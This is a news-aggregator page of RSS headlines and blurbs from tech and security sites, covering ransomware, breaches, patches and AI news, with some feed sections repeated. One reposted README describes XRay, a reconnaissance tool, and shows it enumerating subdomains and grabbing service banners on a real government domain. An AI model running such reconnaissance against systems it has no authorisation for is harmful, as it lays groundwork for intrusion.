News Reader

News Reader

RSS tabs below. Last time of page update: 2025-11-06 23:28:54 GMT+0 Click Here to refresh the page.

START

Select a tab to begin reading.

Tech RSS feeds

Below are tech sites.

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

WhatsApp Rolls Out Passkey-Secured Backups On Android, iOS

After the recent update, WhatsApp users can experience passkey-secured backups for their conversations. WhatsApp has…

WhatsApp Rolls Out Passkey-Secured Backups On Android, iOS on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Thu, 06 Nov 2025 13:05:53 +0000

Aembit Introduces Identity and Access Management for Agentic AI

Silver Spring, USA/ Maryland, 30th October 2025, CyberNewsWire

Aembit Introduces Identity and Access Management for Agentic AI on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Thu, 30 Oct 2025 12:02:02 +0000

How Small Security Teams Can Improve Vulnerability Management

Small security teams are often putting out fires, and as a result, burning out fast.…

How Small Security Teams Can Improve Vulnerability Management on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 29 Oct 2025 11:13:51 +0000

Latest news

One of the best Apple Watches you can buy isn't Apple's newest (but it's 30% off)

The Apple Watch Series 10 might be last year's model, but its specs prove it's basically as capable as the Series 11. The main difference? It's $120 off.

Article link

Date of publish: Thu, 06 Nov 2025 22:00:17 GMT

Get 4 free iPhone 17 or Galaxy S25 phones from T-Mobile right now - here's how

Sign up for T-Mobile's Essentials plan for just $25 per line and get four free phones, with no trade-in required. Here are all the details.

Article link

Date of publish: Thu, 06 Nov 2025 21:25:39 GMT

Let Gemini make your next slide presentation for you - here's how

Struggling with your slides? Here's how Gemini's latest updates can help you polish your presentation, and who can access them.

Article link

Date of publish: Thu, 06 Nov 2025 20:46:00 GMT

NYT > Technology

OpenAI Races to Quell Concerns Over Its Finances

The A.I. company faced pushback after a top executive raised the idea of government aid, amid concerns that the A.I. industry is headed toward a dangerous bubble.

Article link

Date of publish: Thu, 06 Nov 2025 21:52:33 +0000

How A.I. and Social Media Contribute to ‘Brain Rot’

A.I. search tools, chatbots and social media are associated with lower cognitive performance, studies say. What to do?

Article link

Date of publish: Thu, 06 Nov 2025 15:15:31 +0000

Are A.I. Therapy Chatbots Safe to Use?

Psychologists and technologists see them as the future of therapy. The Food and Drug Administration is exploring whether to regulate them as medical devices.

Article link

Date of publish: Thu, 06 Nov 2025 18:20:02 +0000

BleepingComputer

AI-Slop ransomware test sneaks on to VS Code marketplace

A malicious extension with basic ransomware capabilities seemingly created with the help of AI, has been published on Microsoft's official VS Code marketplace. [...]

Article link

Date of publish: Thu, 06 Nov 2025 16:52:47 -0500

How a ransomware gang encrypted Nevada government's systems

The State of Nevada has completed its recovery from a ransomware attack it suffered on August 24, 2025, which impacted 60 state agencies, disrupting critical services related to health and public safety. [...]

Article link

Date of publish: Thu, 06 Nov 2025 14:02:16 -0500

Continuous Purple Teaming: Turning Red-Blue Rivalry into Real Defense

Red and blue teams often operate independently, but attackers don't. Picus Security shows how continuous purple teaming and BAS turn red-blue rivalry into real defense, validating controls and closing gaps in real time. [...]

Article link

Date of publish: Thu, 06 Nov 2025 10:02:12 -0500

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Hacker News: Front Page

Man who threw sandwich at US border agent not guilty of assault

Article URL: https://www.bbc.com/news/articles/c5ypvv8n1jvo

Comments URL: https://news.ycombinator.com/item?id=45841464

Points: 41

# Comments: 10

Article link

Date of publish: Thu, 06 Nov 2025 22:50:45 +0000

Game Design Is Simple

Article URL: https://www.raphkoster.com/2025/11/03/game-design-is-simple-actually/

Comments URL: https://news.ycombinator.com/item?id=45841262

Points: 23

# Comments: 8

Article link

Date of publish: Thu, 06 Nov 2025 22:24:23 +0000

Writing software is an act of learning. Don’t automate it.

Article URL: https://martinfowler.com/articles/llm-learning-loop.html

Comments URL: https://news.ycombinator.com/item?id=45841056

Points: 38

# Comments: 8

Article link

Date of publish: Thu, 06 Nov 2025 22:05:58 +0000

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

WhatsApp Rolls Out Passkey-Secured Backups On Android, iOS

After the recent update, WhatsApp users can experience passkey-secured backups for their conversations. WhatsApp has…

WhatsApp Rolls Out Passkey-Secured Backups On Android, iOS on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Thu, 06 Nov 2025 13:05:53 +0000

Aembit Introduces Identity and Access Management for Agentic AI

Silver Spring, USA/ Maryland, 30th October 2025, CyberNewsWire

Aembit Introduces Identity and Access Management for Agentic AI on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Thu, 30 Oct 2025 12:02:02 +0000

How Small Security Teams Can Improve Vulnerability Management

Small security teams are often putting out fires, and as a result, burning out fast.…

How Small Security Teams Can Improve Vulnerability Management on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 29 Oct 2025 11:13:51 +0000

Microsoft October Patch Tuesday Is Huge With 170+ Fixes

Microsoft has rolled out a huge Patch Tuesday update bundle for October 2025, addressing 175…

Microsoft October Patch Tuesday Is Huge With 170+ Fixes on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Tue, 28 Oct 2025 10:00:38 +0000

nsKnox Launches Adaptive Payment Security™, Revolutionizing B2B Fraud Prevention by Solving the ‘Impossible Triangle’ of Speed, Certainty, and Effort
Microsoft Limits IE Mode In Edge Browser Citing Zero-Day Exploits

Microsoft recently announced changes to the Internet Explorer mode in Edge browsers, citing zero-day exploits…

Microsoft Limits IE Mode In Edge Browser Citing Zero-Day Exploits on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Mon, 27 Oct 2025 11:14:02 +0000

New Stealit Malware Campaign Exploits Node.js SEA Feature

Researchers have found a new Stealit malware campaign in the wild that exploits a Node.js…

New Stealit Malware Campaign Exploits Node.js SEA Feature on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Mon, 27 Oct 2025 11:13:27 +0000

Sendmarc appoints Dan Levinson as Customer Success Director in North America
How To Prepare For Your Virtual Doctor Visit To Get The Most From Your Consultation

We’ve all been there—camera on, audio glitching, laptop balanced on a stack of books, and…

How To Prepare For Your Virtual Doctor Visit To Get The Most From Your Consultation on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Mon, 20 Oct 2025 09:47:02 +0000

MCPTotal Launches to Power Secure Enterprise MCP Workflows

New York, USA, New York, 15th October 2025, CyberNewsWire

MCPTotal Launches to Power Secure Enterprise MCP Workflows on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.

Article link

Date of publish: Wed, 15 Oct 2025 13:01:01 +0000

Latest news

One of the best Apple Watches you can buy isn't Apple's newest (but it's 30% off)

The Apple Watch Series 10 might be last year's model, but its specs prove it's basically as capable as the Series 11. The main difference? It's $120 off.

Article link

Date of publish: Thu, 06 Nov 2025 22:00:17 GMT

Get 4 free iPhone 17 or Galaxy S25 phones from T-Mobile right now - here's how

Sign up for T-Mobile's Essentials plan for just $25 per line and get four free phones, with no trade-in required. Here are all the details.

Article link

Date of publish: Thu, 06 Nov 2025 21:25:39 GMT

Let Gemini make your next slide presentation for you - here's how

Struggling with your slides? Here's how Gemini's latest updates can help you polish your presentation, and who can access them.

Article link

Date of publish: Thu, 06 Nov 2025 20:46:00 GMT

Why even a US tech giant is launching 'sovereign support' for Europe now

Red Hat's new offering comes in response to a broader trend sweeping Europe.

Article link

Date of publish: Thu, 06 Nov 2025 20:23:00 GMT

Can't wait for Spotify Wrapped? Now you get a weekly treat of listening stats

Spotify's newest feature gives you a mini 'Wrapped' every single week - including a custom playlist. Try it now.

Article link

Date of publish: Thu, 06 Nov 2025 20:19:18 GMT

Verizon will give you a free Nintendo Switch right now - here's how

Sign up for a Verizon internet plan and choose between a free Nintendo Switch, Samsung TV, or Samsung tablet with this early Black Friday deal.

Article link

Date of publish: Thu, 06 Nov 2025 20:09:25 GMT

Microsoft researchers tried to manipulate AI agents - and only one resisted all attempts

AI agents can buy and sell on our behalf. Here's why that should worry us.

Article link

Date of publish: Thu, 06 Nov 2025 20:01:25 GMT

Google Maps vs. Waze: I compared two of the best navigation apps, and here's who wins

The Waze vs. Google Maps debate has raged for years. Here's my verdict after testing both.

Article link

Date of publish: Thu, 06 Nov 2025 19:45:00 GMT

I found the ultimate battery charger, and power users will love its flagship feature

It charges, refreshes, and prepares your batteries for long-term storage.

Article link

Date of publish: Thu, 06 Nov 2025 19:22:39 GMT

This ultraportable tablet is one of my favorites for media consumption - and it's at a new low price

For a limited time, get $200 off the OnePlus Pad 2 and receive a protective case.

Article link

Date of publish: Thu, 06 Nov 2025 18:50:21 GMT

I wore 5 different headphones across 8 flights - here's how each pair handled my stress tests

The airplane is the ultimate test for headphones and earbuds. I tried the top models so you don't have to.

Article link

Date of publish: Thu, 06 Nov 2025 18:43:00 GMT

I did not expect to like these open-ear headphones as much as I did - just look at them

The Nwm One open-ear headphones aren't perfect in every environment, but their unique design and rich sound make a case for aware, immersive listening.

Article link

Date of publish: Thu, 06 Nov 2025 18:29:00 GMT

How to buy the right laptop for school, work, and play (and common mistakes to avoid)

If you're upgrading your Windows or Mac PC and are overwhelmed with the options, here's what to prioritize in your selection process.

Article link

Date of publish: Thu, 06 Nov 2025 18:14:00 GMT

Turn your old tech into Costco gift cards before Black Friday - here's how

Got old gadgets laying around? Trade them in for gift cards - no Costco membership required.

Article link

Date of publish: Thu, 06 Nov 2025 18:04:00 GMT

I changed 10 settings on my Fire TV to significantly improve the performance

If your Fire TV or Fire TV Stick feels sluggish, don't rush to replace it - these quick tips can give it a serious speed boost.

Article link

Date of publish: Thu, 06 Nov 2025 17:58:00 GMT

You should turn off ACR on your TV right now (and why it matters so much to privacy)

Your smart TV comes with privacy risks. Here's how to avoid one of the biggest with just a few steps.

Article link

Date of publish: Thu, 06 Nov 2025 17:57:00 GMT

How to record your screen in Windows 10 or 11 - in just a few clicks

Your Windows PC already has everything you need to record your screen. Here's how to do it.

Article link

Date of publish: Thu, 06 Nov 2025 17:51:00 GMT

Use Google Finance? It just got a new Gemini-powered 'Deep Search' trick - how to try it

These new AI features surface more information faster. Can they help Google compete with Yahoo Finance?

Article link

Date of publish: Thu, 06 Nov 2025 17:00:00 GMT

Best early Black Friday laptop deals 2025: 12+ sales out early

Black Friday is a few weeks away, but there are some good deals on laptops live now. Here are the best ones from Apple, HP, Dell, Lenovo, and more.

Article link

Date of publish: Thu, 06 Nov 2025 16:58:00 GMT

My 30-second Samsung watch routine keeps the system running like new (and it works on most models)

This simple Galaxy Watch trick can solve battery drain, glitches, lag, and more. Here's how it works.

Article link

Date of publish: Thu, 06 Nov 2025 16:25:00 GMT

NYT > Technology

OpenAI Races to Quell Concerns Over Its Finances

The A.I. company faced pushback after a top executive raised the idea of government aid, amid concerns that the A.I. industry is headed toward a dangerous bubble.

Article link

Date of publish: Thu, 06 Nov 2025 21:52:33 +0000

How A.I. and Social Media Contribute to ‘Brain Rot’

A.I. search tools, chatbots and social media are associated with lower cognitive performance, studies say. What to do?

Article link

Date of publish: Thu, 06 Nov 2025 15:15:31 +0000

Are A.I. Therapy Chatbots Safe to Use?

Psychologists and technologists see them as the future of therapy. The Food and Drug Administration is exploring whether to regulate them as medical devices.

Article link

Date of publish: Thu, 06 Nov 2025 18:20:02 +0000

Mark Zuckerberg and Priscilla Chan Restructure Their Philanthropy

The Chan Zuckerberg Initiative said its restructured organization, Biohub, would lead its focus on artificial intelligence and scientific research.

Article link

Date of publish: Thu, 06 Nov 2025 19:07:08 +0000

Tesla Investors Back Musk’s Trillion Dollar Payday

Shareholders approved a plan to grant Mr. Musk shares worth nearly $1 trillion if he meets ambitious goals, including vastly expanding the company’s stock market valuation.

Article link

Date of publish: Thu, 06 Nov 2025 22:56:11 +0000

Government Shutdown Blame Game Plays Out Online and on TV

A blame game has played out on the internet and on television. President Trump has pulled out the stops.

Article link

Date of publish: Thu, 06 Nov 2025 20:29:18 +0000

Where You See a Fancy Fish, Engineers See Alan Turing’s Math

Using a new computer model, scientists simulated the stripes, spots and hexagons on a species of boxfish, imperfections and all.

Article link

Date of publish: Thu, 06 Nov 2025 10:02:17 +0000

Would Elon Musk Work Harder for $1 Trillion Than $1 Billion?

Economists and psychologists say that compensation may not provide as powerful an incentive as is often assumed.

Article link

Date of publish: Thu, 06 Nov 2025 05:00:05 +0000

How Trade Tensions Sent Automakers Scrambling for Chips

Carmakers and their suppliers are piecing together new supply chains after a Chinese-owned company in the Netherlands was caught in the middle of the trade war, revealing European vulnerabilities.

Article link

Date of publish: Wed, 05 Nov 2025 20:14:48 +0000

Why Does So Much New Technology Feel Inspired by Dystopian Sci-Fi Movies?

The industry keeps echoing ideas from bleak satires and cyberpunk stories as if they were exciting possibilities, not grim warnings.

Article link

Date of publish: Wed, 05 Nov 2025 10:01:21 +0000

IBM to Cut Thousands of Workers Amid A.I. Boom

The technology supplier said it was shifting its focus to higher-growth businesses, including A.I. consulting and software.

Article link

Date of publish: Tue, 04 Nov 2025 23:57:31 +0000

The Editor Got a Letter From ‘Dr. B.S.’ So Did a Lot of Other Editors.

The rise of artificial intelligence has produced serial writers to science and medical journals, most likely using chatbots to boost the number of citations they’ve published.

Article link

Date of publish: Tue, 04 Nov 2025 17:18:06 +0000

How A.I. Is Transforming Dating Apps

Meet your artificial intelligence matchmakers. These A.I. tools are changing dating apps, so users don’t have to swipe through an endless scroll of profiles.

Article link

Date of publish: Mon, 03 Nov 2025 15:20:51 +0000

Facebook Dating Has Become a Surprise Hit for the Social Network

Facebook’s free dating service has 21 million users, more than the popular dating app Hinge, as the social network reinvents itself.

Article link

Date of publish: Mon, 03 Nov 2025 17:51:05 +0000

OpenAI Signs $38 Billion Cloud Computing Deal With Amazon

After signing agreements to use computing power from Nvidia, AMD and Oracle, OpenAI is teaming up with the world’s largest cloud computing company.

Article link

Date of publish: Mon, 03 Nov 2025 19:07:24 +0000

Control of Tesla Is at Stake in Vote on Elon Musk’s Pay Plan

Mr. Musk’s supporters say he may quit if shareholders don’t approve a trillion-dollar package. Some investors say it’s excessive and would give him too much sway.

Article link

Date of publish: Mon, 03 Nov 2025 15:44:33 +0000

Everyone Hates ‘Friend,’ the A.I. Necklace. But the A.I. Isn’t the Problem.

A wearable companion is a brilliant idea — in theory.

Article link

Date of publish: Tue, 04 Nov 2025 19:31:46 +0000

That Time Xi Jinping Joked About Espionage

Xi Jinping gave two cellphones to South Korea’s president, who asked how secure they were. “You can check if there’s a backdoor,” he said with a laugh.

Article link

Date of publish: Mon, 03 Nov 2025 07:51:23 +0000

Character.AI’s Teen Chatbot Crackdown + Elon Musk Groks Wikipedia + 48 Hours Without A.I.

“We are living through a dramatic contraction in the access that teenagers have to technology online.”

Article link

Date of publish: Fri, 31 Oct 2025 11:00:06 +0000

Nvidia, Samsung and Hyundai C.E.O.s Meet in Seoul Ahead of Business Deal Announcement

Jensen Huang, the Nvidia chief executive, and the leaders of Samsung and Hyundai staged a regular-folks outing in Seoul before announcing a business deal.

Article link

Date of publish: Fri, 31 Oct 2025 11:46:16 +0000

A.I. Spending Is Accelerating Among Tech’s Biggest Companies

Despite the risk of a bubble, Google, Meta, Microsoft and Amazon plan to spend billions more on artificial intelligence than they already do.

Article link

Date of publish: Fri, 31 Oct 2025 14:25:19 +0000

BleepingComputer

AI-Slop ransomware test sneaks on to VS Code marketplace

A malicious extension with basic ransomware capabilities seemingly created with the help of AI, has been published on Microsoft's official VS Code marketplace. [...]

Article link

Date of publish: Thu, 06 Nov 2025 16:52:47 -0500

How a ransomware gang encrypted Nevada government's systems

The State of Nevada has completed its recovery from a ransomware attack it suffered on August 24, 2025, which impacted 60 state agencies, disrupting critical services related to health and public safety. [...]

Article link

Date of publish: Thu, 06 Nov 2025 14:02:16 -0500

Continuous Purple Teaming: Turning Red-Blue Rivalry into Real Defense

Red and blue teams often operate independently, but attackers don't. Picus Security shows how continuous purple teaming and BAS turn red-blue rivalry into real defense, validating controls and closing gaps in real time. [...]

Article link

Date of publish: Thu, 06 Nov 2025 10:02:12 -0500

ClickFix malware attacks evolve with multi-OS support, video tutorials

ClickFix attacks have evolved to feature videos that guide victims through the self-infection process, a timer to pressure targets into taking risky actions, and automatic  detection of the operating system to provide the correct commands. [...]

Article link

Date of publish: Thu, 06 Nov 2025 09:00:00 -0500

Critical Cisco UCCX flaw lets attackers run commands as root

Cisco has released security updates to patch a critical vulnerability in the Unified Contact Center Express (UCCX) software, which could enable attackers to execute commands with root privileges. [...]

Article link

Date of publish: Thu, 06 Nov 2025 08:31:10 -0500

Sandworm hackers use data wipers to disrupt Ukraine's grain sector

Russian state-backed hacker group Sandworm has deployed multiple data-wiping malware families in attacks targeting Ukraine's education, government, and the grain sector, the country's main revenue source. [...]

Article link

Date of publish: Thu, 06 Nov 2025 05:01:28 -0500

Gootloader malware is back with new tricks after 7-month break

The Gootloader malware loader operation has returned after a 7-month absence and is once again performing SEO poisoning to promote fake websites that distribute the malware. [...]

Article link

Date of publish: Wed, 05 Nov 2025 16:52:45 -0500

Hyundai AutoEver America data breach exposes SSNs, drivers licenses

Hyundai AutoEver America is notifying individuals that hackers breached the company's IT environment and gained access to personal information. [...]

Article link

Date of publish: Wed, 05 Nov 2025 16:19:02 -0500

CISA warns of critical CentOS Web Panel bug exploited in attacks

The U.S. Cybersecurity & Infrastructure Security Agency (CISA) is warning that threat actors are exploiting a critical remote command execution flaw in CentOS Web Panel (CWP). [...]

Article link

Date of publish: Wed, 05 Nov 2025 13:26:25 -0500

Windows 11 Store gets Ninite-style multi-app installer feature

The Microsoft Store on the web now lets you create a multi-app install package on Windows 11 that installs multiple applications from a single installer. [...]

Article link

Date of publish: Wed, 05 Nov 2025 12:28:34 -0500

SonicWall says state-sponsored hackers behind September security breach

SonicWall's investigation into the September security breach that exposed customers' firewall configuration backup files concludes that state-sponsored hackers were behind the attack. [...]

Article link

Date of publish: Wed, 05 Nov 2025 12:13:07 -0500

UK carriers to block spoofed phone numbers in fraud crackdown

Under a new partnership with the government aimed at combating fraud, Britain's largest mobile carriers have committed to upgrading their networks to eliminate scammers' ability to spoof phone numbers within a year. [...]

Article link

Date of publish: Wed, 05 Nov 2025 11:33:51 -0500

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps
  • There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS
  • Collection Sources

Some of these sources will require an API key, and occasionally only by getting a paid account and tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks
  • Risk Scoring

The risk scoring works best when Mimir can gather a decent amount of data points for an IOC; pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.) and also takes into account the ML malicious-ness prediction result.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time


"Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time".


Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEO's like Satya Nadella, McAfee's CEO Chris Young, Cisco's CIO Colin Seward shine light on it from time to time.

This book put together all the possible information with regards to cybersecurity, why you should choose it, the need for cyber security and how can you be part of it and fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment
  • By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Best Practices For Protecting Against Phishing, Ransomware and Email Fraud


"Best Practices for Protecting Against Phishing, Ransomware and Email Fraud"


Osterman Research conducted a survey among corporate decisions makers in early 2018 and found that nearly 28% of those organizations had experienced a phishing attack that was successful in infecting their networks with malware.

Over 17% of organizations had email as part of a CEO Fraud/BEC attack that successfully tricked one or more of their senior executives in the last 12 months. Don’t let this happen to your organization.

Download the Osterman Research Whitepaper, Best Practices for Protecting Against Phishing, Ransomware and Email Fraud, and learn ten best practices you should consider to better protect your systems and network, train your users to be security-aware, and safeguard your organization’s sensitive and confidential data from phishing attacks, ransomware, and CEO Fraud.

Article link

Date of publish: Mon, 25 Nov 2019 07:46:00 +0000

XRay - Using For Recon Mapping And OSINT Suite


XRay is a software for recon, mapping and OSINT gathering from public networks.

XRay for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic.

How Does it Work?

XRay is a very simple tool, it works this way:
  1. It'll bruteforce subdomains using a wordlist and DNS requests.
  2. For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
  3. If a ViewDNS API key is provided, for every subdomain historical data will be collected.
  4. For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.
  5. Eventually the data is presented to the user on the web ui.

Grabbers and Collectors

  • HTTP Server, X-Powered-By and Location headers.
  • HTTP and HTTPS robots.txt disallowed entries.
  • HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).
  • HTML title tag.
  • DNS version.bind. and hostname.bind. records.
  • MySQL, SMTP, FTP, SSH, POP and IRC banners.

Notes

Shodan API Key

The shodan.io API key parameter ( -shodan-key KEY ) is optional, however if not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it just gonna be DNS subdomain enumeration).

ViewDNS API Key

If a ViewDNS API key parameter ( -viewdns-key KEY ) is passed, domain historical data will also be retrieved.

Anonymity and Legal Issues

The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.

Building a Docker image

To build a Docker image with the latest version of XRay:

git clone https://github.com/evilsocket/xray.git
cd xray
docker build -t xraydocker .

Once built, XRay can be started within a Docker container using the following:

docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com 

Manual Compilation

Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.

Then:

go get github.com/evilsocket/xray
cd $GOPATH/src/github.com/evilsocket/xray/
make

You'll find the executable in the build folder.

Usage

Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN

Options:
  -address string
        IP address to bind the web ui server to. (default "127.0.0.1")
  -consumers int
        Number of concurrent consumers to use for subdomain enumeration. (default 16)
  -domain string
        Base domain to start enumeration from.
  -port int
        TCP port to bind the web ui server to. (default 8080)
  -preserve-domain
        Do not remove subdomain from the provided domain name.
  -session string
        Session file name. (default "<domain-name>-xray-session.json")
  -shodan-key string
        Shodan API key.
  -viewdns-key string
        ViewDNS API key.
  -wordlist string
        Wordlist file to use for enumeration. (default "wordlists/default.lst")

Example:

# xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov

____  ___
\   \/  /
 \     RAY v 1.0.0b
 /    by Simone 'evilsocket' Margaritelli
/___/\  \
      \_/

@ Saving session to fbi.gov-xray-session.json
@ Web UI running on http://127.0.0.1:8080/

Download XRay

Article link

Date of publish: Mon, 11 Nov 2019 09:53:00 +0000

Hacking for Dummies, 6th Edition ($29.99 Value) Free


"Hacking for Dummies, 6th Edition ($29.99 Value) Free for a Limited Time"

Stop hackers before they hack you!


In order to outsmart a would-be hacker, you need to get into the hacker’s mindset and with this book, thinking like a bad guy has never been easier. Get expert knowledge on penetration testing, vulnerability assessments, security best practices, and ethical hacking that is essential in order to stop a hacker in their tracks.

